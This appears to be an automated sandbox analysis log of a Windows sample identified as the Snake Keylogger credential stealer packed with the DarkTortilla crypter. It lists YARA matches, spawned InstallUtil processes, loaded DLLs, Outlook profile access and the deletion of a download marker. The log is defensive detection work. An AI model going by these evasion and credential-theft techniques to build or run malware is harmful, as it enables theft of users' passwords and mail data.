                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sS7Jrsk0Z7.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: sS7Jrsk0Z7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sS7Jrsk0Z7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002DFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: sS7Jrsk0Z7.exeReversingLabs: Detection: 75%
                    Source: sS7Jrsk0Z7.exeVirustotal: Detection: 65%
                    Source: unknownProcess created: C:\Users\user\Desktop\sS7Jrsk0Z7.exe "C:\Users\user\Desktop\sS7Jrsk0Z7.exe"
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: sS7Jrsk0Z7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: sS7Jrsk0Z7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Yara detected DarkTortilla Crypter
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c98e40.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3d18e60.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c98e40.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.5070000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3d18e60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.5070000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1798101450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_076D36B8 pushfd ; retf 1_2_076D3E11
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_076DD84C push FFFFFF8Bh; retf 1_2_076DD84E
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_076DA01D push esi; ret 1_2_076DA023
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0780F3C3 push 0C077FAAh; iretd 1_2_0780F3CD
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078BBBE3 push ecx; ret 1_2_078BBC12
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078BBBCF pushad ; ret 1_2_078BBBD3
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078BDA95 pushad ; ret 1_2_078BDAF3
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078BAAC5 push esi; ret 1_2_078BAAC6
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798C98E push ebp; ret 1_2_0798C9A5
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798090C push es; ret 1_2_0798090F
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798752B push cs; ret 1_2_0798752C
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_079828D2 push cs; retf 1_2_079828D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_01239C30 push esp; retf 02A4h10_2_01239D55

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeFile opened: C:\Users\user\Desktop\sS7Jrsk0Z7.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
